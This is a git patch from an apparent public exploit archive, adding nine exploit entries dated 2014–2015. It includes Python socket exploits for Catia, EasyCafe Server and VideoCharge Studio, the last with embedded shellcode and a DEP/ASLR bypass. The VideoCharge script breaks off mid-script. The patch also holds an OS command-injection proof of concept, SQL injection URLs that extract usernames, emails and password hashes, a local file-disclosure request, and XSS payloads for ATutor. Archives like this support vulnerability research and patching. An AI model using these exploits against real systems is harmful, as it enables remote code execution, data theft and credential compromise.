From 415f43407d855fe60a4ec70d4c357c8e33fb7eb3 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 27 Dec 2015 05:02:11 +0000 Subject: [PATCH] DB: 2015-12-27 9 new exploits --- files.csv | 9 ++ platforms/asp/webapps/39106.txt | 7 ++ platforms/multiple/remote/39104.py | 25 ++++++ platforms/php/webapps/39093.txt | 27 ++++++ platforms/php/webapps/39107.txt | 83 ++++++++++++++++++ platforms/php/webapps/39108.txt | 10 +++ platforms/php/webapps/39109.txt | 9 ++ platforms/php/webapps/39110.txt | 9 ++ platforms/windows/local/39102..py | 55 ++++++++++++ platforms/windows/remote/39105.py | 134 +++++++++++++++++++++++++++++ 10 files changed, 368 insertions(+) create mode 100755 platforms/asp/webapps/39106.txt create mode 100755 platforms/multiple/remote/39104.py create mode 100755 platforms/php/webapps/39093.txt create mode 100755 platforms/php/webapps/39107.txt create mode 100755 platforms/php/webapps/39108.txt create mode 100755 platforms/php/webapps/39109.txt create mode 100755 platforms/php/webapps/39110.txt create mode 100755 platforms/windows/local/39102..py create mode 100755 platforms/windows/remote/39105.py diff --git a/files.csv b/files.csv index cb6386852..844cd3de2 100755 --- a/files.csv +++ b/files.csv @@ -35334,6 +35334,8 @@ id,file,description,date,author,platform,type,port 39072,platforms/win64/dos/39072.txt,"Adobe Flash Sound.setTransform - Use-After-Free",2015-12-21,"Google Security Research",win64,dos,0 39073,platforms/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/reboot.cgi Unauthenticated Remote Reboot DoS",2014-02-03,"Josue Rojas",cgi,dos,0 39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 +39105,platforms/windows/remote/39105.py,"VideoCharge Studio 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow Vulnerability",2014-02-19,"Julien Ahrens",windows,remote,0 +39104,platforms/multiple/remote/39104.py,"Dassault Systemes Catia Stack Buffer Overflow Vulnerability",2014-02-19,"Mohamed Shetta",multiple,remote,0 39076,platforms/multiple/dos/39076.txt,"Wireshark infer_pkt_encap - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0 39077,platforms/multiple/dos/39077.txt,"Wireshark AirPDcapDecryptWPABroadcastKey - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0 39078,platforms/php/webapps/39078.txt,"Web Video Streamer Multiple Security Vulnerabilities",2014-01-22,"Eric Sesterhenn",php,webapps,0 @@ -35351,6 +35353,13 @@ id,file,description,date,author,platform,type,port 39090,platforms/php/webapps/39090.php,"WordPress Kiddo Theme Arbitrary File Upload Vulnerability",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39091,platforms/php/webapps/39091.pl,"WHMCS 'cart.php' Denial of Service Vulnerability",2014-02-07,Amir,php,webapps,0 39092,platforms/php/webapps/39092.pl,"phpBB <= 3.0.8 Remote Denial of Service Vulnerability",2014-02-11,Amir,php,webapps,0 +39093,platforms/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin 'jqueryFileTree.php' Directory Traversal Vulnerability",2014-02-19,"Tom Adams",php,webapps,0 39101,platforms/php/webapps/39101.php,"MODx Evogallery Module 'uploadify.php' Arbitrary File Upload Vulnerability",2014-02-18,"TUNISIAN CYBER",php,webapps,0 +39102,platforms/windows/local/39102..py,"EasyCafe Server <= 2.2.14 Remote File Read",2015-12-26,R-73eN,windows,local,0 +39106,platforms/asp/webapps/39106.txt,"eshtery CMS 'FileManager.aspx' Local File Disclosure Vulnerability",2014-02-22,peng.deng,asp,webapps,0 +39107,platforms/php/webapps/39107.txt,"ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0 +39108,platforms/php/webapps/39108.txt,"POSH 3.1.x 'addtoapplication.php' SQL Injection Vulnerability",2014-02-26,"Anthony BAUBE",php,webapps,0 +39109,platforms/php/webapps/39109.txt,"WordPress Relevanssi Plugin 'category_name' Parameter SQL Injection Vulnerability",2014-03-04,anonymous,php,webapps,0 +39110,platforms/php/webapps/39110.txt,"Cory Jobs Search 'cid' Parameter SQL Injection Vulnerability",2014-03-05,Slotleet,php,webapps,0 diff --git a/platforms/asp/webapps/39106.txt b/platforms/asp/webapps/39106.txt new file mode 100755 index 000000000..4fd1a14d8 --- /dev/null +++ b/platforms/asp/webapps/39106.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/65740/info + +eshtery CMS is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input. + +Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. + + http://www.example.com/[path]/FileManager.aspx?file=E:\web\admin.asp \ No newline at end of file diff --git a/platforms/multiple/remote/39104.py b/platforms/multiple/remote/39104.py new file mode 100755 index 000000000..aa1988b44 --- /dev/null +++ b/platforms/multiple/remote/39104.py @@ -0,0 +1,25 @@ +source: http://www.securityfocus.com/bid/65675/info + +Catia is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. + +An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. + +Catia V5-6R2013 is vulnerable. + +#!/usr/bin/env python + +import socket +import struct +import ctypes + +RetAdd="\x90\x90\x90\x90" +Shell="S" *1000 +buff= "\x00\x01\x00\x30" + "A" * 20 + "AppToBusInitMsg" +"\x00" + "\x00" * 48 + "CATV5_Backbone_Bus" +"\x00" + "\x00"* 49 + "\x00\x00\x00\x00" +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(("192.168.0.3", 55555)) +#s.connect(("192.168.0.5", 55558)) +s.send(struct.pack('>I',len(buff) )) +s.send(buff) +buff= "\x02\x00\x00\x00" + RetAdd*3 + "\x00\x00\x00\x00" * 13 + "\x00\x00\x00\x00" * 5 + "CATV5_AllApplications" +"\x00" + "\x00"* 43 +"\x00\x00\x98" + "\x00\x00\x00\x01" +"\x00"*4 +"\x08\x00\x00\x00" + Shell +s.send(struct.pack('>I',len(buff) )) +s.send(buff) diff --git a/platforms/php/webapps/39093.txt b/platforms/php/webapps/39093.txt new file mode 100755 index 000000000..7ef2ddbe4 --- /dev/null +++ b/platforms/php/webapps/39093.txt @@ -0,0 +1,27 @@ +================================================================================ +# Beezfud Remote Code Execution +================================================================================ +# Vendor Homepage: https://github.com/EVA-01/beezfud +# Date: 23/12/2015 +# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip +# Author: Ashiyane Digital Security Team +# Contact: hehsan979@gmail.com +# Source: http://ehsansec.ir/advisories/beezfud-exec.txt +================================================================================ +# Vulnerable File : index.php + +# PoC : + +http://localhost/beezfud/index.php?parameter=;Command; + +Vulnerable Parameters : lookback , max , range , latest , earliest + + +Example : + +http://localhost/beezfud/index.php?lookback=;echo '' >info.php; + +================================================================================ +# Discovered By : Ehsan Hosseini (EhsanSec.ir) +================================================================================ diff --git a/platforms/php/webapps/39107.txt b/platforms/php/webapps/39107.txt new file mode 100755 index 000000000..322e21efc --- /dev/null +++ b/platforms/php/webapps/39107.txt @@ -0,0 +1,83 @@ +source: http://www.securityfocus.com/bid/65744/info + +ATutor is prone to multiple cross-site scripting vulnerabilities and a HTML-injection vulnerability. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +ATutor 2.1.1 is vulnerable; other versions may also be affected. + +1. During installation: xss and sql insertion: + +------ +POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1 +Host: www.example.com +(...) +Content-Length: 191 + +action=process&step=2&new_version=2.1.1&db_host=localhost&db_port=3306&db_login=root&db_password=superpass&db_name='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&tb_prefix=AT_&submit=Next+%BB+ +------ + + +------ +
  • Database \'>\"> created successfully. +------ + +--> tb_prefix and new_version parameter are also vulnerable. + + +# ============================================================== +# 2. XSS + +------ +POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1 +Host: www.example.com +(...) +Content-Length: 667 + +action=process&form_admin_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&form_account_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&step=3&step2%5Bnew_version%5D='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&step2%5Bdb_host%5D=localhost&step2%5Bdb_port%5D=3306&step2%5Bdb_login%5D=root&step2%5Bdb_password%5D=superpass&step2%5Bdb_name%5D=atutor&step2%5Btb_prefix%5D=AT_&smtp=false&admin_username=admin&admin_password=&admin_email=admin%40here.com&site_name=Course+Server&email=admin%40here.com&just_social=0&home_url=&account_username=admin&account_password=&account_email=admin%40here.com&account_fname=admin&account_lname=admin&submit=+Next+%BB + +------ + +Vulnerable to XSS are also parameters: +step2%5Bnew_version%5D +step2%5Bdb_host%5D +step2%5Bdb_port%5D +step2%5Bdb_login%5D +step2%5Bdb_password%5D +step2%5Bdb_name%5D +step2%5Btb_prefix%5D + + +# ============================================================== +# 3. Persistent XSS (from admin) + +------ +POST /k/cms/atutor/ATutor/mods/_standard/forums/admin/forum_add.php HTTP/1.1 +Host: www.example.com +(...) +Content-Length: 108 + +add_forum=true&title='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&description=aaaaaaaaaaaaaa&edit=0&submit=Save +------ + +------ +*
    + " /> + +------ + + + +# ============================================================== +# 4. Edit config (from admin user): + +------ +POST /k/cms/atutor/ATutor/admin/config_edit.php HTTP/1.1 +Host: www.example.com +(...) +Content-Length: 946 + +site_name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&home_url=http%3A%2F%2Fwww.atutorspaces.com&default_language=en&contact_email=admin%40here.com&time_zone=0&session_timeout=20&max_file_size=10485760&max_course_size=104857600&max_course_float=2097152&max_login=5&display_name_format=1&master_list=0&allow_registration=1&allow_browse=1&show_current=1&allow_instructor_registration=1&use_captcha=0&allow_unenroll=1&email_confirmation=0&allow_instructor_requests=1&disable_create=0&email_notification=1&auto_approve_instructors=0&theme_categories=0&user_notes=0&illegal_extentions=exe+asp+php+php3+bat+cgi+pl+com+vbs+reg+pcd+pif+scr+bas+inf+vb+vbe+wsc+wsf+wsh&cache_dir=&cache_life=7200&latex_server=http%3A%2F%2Fwww.atutor.ca%2Fcgi%2Fmimetex.cgi%3F&course_backups=5&sent_msgs_ttl=120&check_version=0&fs_versioning=1&old_enable_mail_queue=0&enable_mail_queue=0&auto_install_languages=0&pretty_url=0&course_dir_name=0&apache_mod_rewrite=0&submit=Save +------ diff --git a/platforms/php/webapps/39108.txt b/platforms/php/webapps/39108.txt new file mode 100755 index 000000000..564888807 --- /dev/null +++ b/platforms/php/webapps/39108.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/65817/info + +POSH is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Versions prior to POSH 3.3.0 are vulnerable. + +http://www.example.com/portal/addtoapplication.php?pid=0&rssurl=url,nbvariables,defvar%20FROM%20dir_item,dir_cat_item +%20WHERE%201=0%20UNION%20SELECT%201,2,3,4,5,6,(select%20group_concat(username,':',email,':',md5pass)%20from%20users),8%23 \ No newline at end of file diff --git a/platforms/php/webapps/39109.txt b/platforms/php/webapps/39109.txt new file mode 100755 index 000000000..adbc17de9 --- /dev/null +++ b/platforms/php/webapps/39109.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/65960/info + +Relevanssi plugin for WordPress is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +Versions prior to Relevanssi 3.3 are vulnerable. + +http://www.example.com/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi \ No newline at end of file diff --git a/platforms/php/webapps/39110.txt b/platforms/php/webapps/39110.txt new file mode 100755 index 000000000..4d9683f87 --- /dev/null +++ b/platforms/php/webapps/39110.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/65969/info + +Cory Jobs Search is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Cory Jobs Search 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/coryapps/jobsearch/admincp/city.php?cid=[MySQL Injection] \ No newline at end of file diff --git a/platforms/windows/local/39102..py b/platforms/windows/local/39102..py new file mode 100755 index 000000000..e2abfe75c --- /dev/null +++ b/platforms/windows/local/39102..py @@ -0,0 +1,55 @@ +#!/usr/bin/python -w +# Title : EasyCafe Server <= 2.2.14 Remote File Read +# Date : 25/12/2015 +# Author : R-73eN +# Tested on : Windows 7 Ultimate +# Software Link : http://www.tinasoft.com/easycafe/ +# Download Link: http://www.tinasoft.com/Download/easysetup.exe +# Vulnerable Versions : EasyCafe Server <= 2.2.14 +# EasyCafe Server has a feature to upload file from the server to a client. +# And the request is as following. EasyCafe Server sends an UDP request to the client with the file that wants to upload, +# Then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it. +# The problem is that a remote attacker can connect to port 831 and can retrive a file becuase the server doesn't validate the request, +# and does not check if it has sent the UDP request which gives us full Read access to the system. +# +#EDB Note: Code my need some adjusting + +import socket +#Banner +banner = "" +banner += " ___ __ ____ _ _ \n" +banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" +banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" +banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" +banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" +print banner + + + +IP = "192.168.43.36" # Target IP +PORT = 831 +file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read + + + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((IP, PORT)) +file_to_read = "\x43" + file_to_read +hex_value = ''.join(x.encode('hex') for x in file_to_read) +fill = "\x00" +end = "\x01\x00\x00\x00\x01" +payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) + end +s.send(payload) +s.settimeout(0) +print "[+] Request Send Waiting for Response . . . [+]" + +try: + data = s.recv(261) # Get header + while data: + data = s.recv(2048) + print data + +except Exception: + print "[+] https://www.infogen.al/ [+]" +finally: + s.close() \ No newline at end of file diff --git a/platforms/windows/remote/39105.py b/platforms/windows/remote/39105.py new file mode 100755 index 000000000..f3055bb9c --- /dev/null +++ b/platforms/windows/remote/39105.py @@ -0,0 +1,134 @@ +source: http://www.securityfocus.com/bid/65685/info + +VideoCharge Studio is prone to a remote stack-based buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. + +Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts likely result in denial-of-service conditions. + +VideoCharge Studio 2.12.3.685 is vulnerable; other versions may also be affected. + +#!/usr/bin/python +# Exploit Title: VideoCharge Studio v2.12.3.685 cc.dll GetHttpResponse() +MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass) +# Version: v2.12.3.685 +# Date: 2014-02-18 +# Author: Julien Ahrens (@MrTuxracer) +# Homepage: http://www.rcesecurity.com +# Software Link: http://www.videocharge.com +# Tested on: Win7-GER (DEP enabled) +# +# Howto / Notes: +# Since it's a MITM RCE you need to spoof the DNS Record for +www.videocharge.com in order to successfully exploit this vulnerability +# + +from socket import * +from struct import pack +from time import sleep + +host = "192.168.0.1" +port = 80 + +s = socket(AF_INET, SOCK_STREAM) +s.bind((host, port)) +s.listen(1) +print "\n[+] Listening on %d ..." % port + +cl, addr = s.accept() +print "[+] Connection accepted from %s" % addr[0] + +# Thanks Giuseppe D'Amore for the amazing shellcode +# http://www.exploit-db.com/exploits/28996/ +shellcode = +("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+ +"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+ +"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+ +"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+ +"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+ +"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+ +"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+ +"\x49\x0b\x31\xc0\x51\x50\xff\xd7") + +junk0 = "\x90" * 1277 +junk1 = "\x90" * 1900 +nops="\x90" * 30 +jmpesp=pack('